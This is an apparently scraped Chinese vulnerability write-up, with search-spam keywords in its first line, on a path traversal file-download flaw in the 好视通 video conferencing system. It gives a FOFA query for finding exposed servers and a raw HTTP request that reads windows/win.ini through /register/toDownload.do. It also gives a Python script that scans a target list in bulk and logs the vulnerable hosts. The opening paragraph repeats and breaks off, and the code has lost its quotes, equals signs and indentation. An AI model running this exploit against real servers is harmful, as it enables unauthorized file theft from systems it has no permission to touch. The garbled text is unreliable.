怎么看一个网站什么语言做的,企业网站首页图片,门户网站定制开发,江苏强荣建设有限公司 网站漏洞简介
好视通视频会议是由深圳市华视瑞通信息技术有限公司开发#xff0c;其在国内率先推出了3G互联网视频会议#xff0c;并成功应用于SAAS领域。
资产
FOFA:app好视通-视频会议 POC
GET /register/toDownload.do?fileName../../../../../../../../../.…漏洞简介
好视通视频会议是由深圳市华视瑞通信息技术有限公司开发其在国内率先推出了3G互联网视频会议并成功应用于SAAS领域。
资产
FOFA:app好视通-视频会议 POC
GET /register/toDownload.do?fileName../../../../../../../../../../../../../../windows/win.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0
漏洞复现
使用Burp或Yakit进行发包测试 批量测试
pip install requests
然后运行脚本进行测试
import requestsimport concurrent.futures
def check_vulnerability(target): headers { User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1), Content-Length:0 }try: # print(target) res requests.get(f{target}/register/toDownload.do?fileName../../../../../../../../../../../../../../windows/win.ini, headersheaders, timeout5,verifyFalse) if extensionsin res.text and CMCDLLNAME32 in res.text: print(f[]{target}漏洞存在) with open(attack.txt,a) as fw: fw.write(f{target}\n) else: print(f[-]{target}漏洞不存在) except Exception as e: print(f[-]{target}访问错误)
if __name__ __main__: print(------------------------) print(微信公众号:知攻善防实验室) print(------------------------) print(target.txt存放目标文件) print(attack.txt存放检测结果) print(------------------------) print(按回车继续) import os os.system(pause) f open(target.txt, r) targets f.read().splitlines() print(targets)# 使用线程池并发执行检查漏洞 with concurrent.futures.ThreadPoolExecutor(max_workers1) as executor: executor.map(check_vulnerability, targets)
